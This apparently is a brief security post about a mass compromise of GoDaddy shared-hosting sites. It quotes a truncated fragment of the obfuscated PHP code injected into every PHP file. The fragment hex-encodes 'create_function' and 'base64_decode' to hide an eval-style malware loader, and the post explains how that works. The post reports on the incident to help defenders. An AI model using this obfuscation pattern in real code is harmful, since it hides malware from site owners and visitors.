[fseek]

Another one of those "mass" attacks on GoDaddy started today.

The blog doesn't give any numbers, but it seems that a few of their shared servers were compromised, so a few thousand of sites at least.

One of my clients still host in there and her files were all modified around 1pm today.

What I find unusual is the kind of code added to all PHP files:

" $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f.. \x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";.. $_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY.. "

If you decode that, it is an encoded "eval(base64_decode" to load the malware as hidden as possible.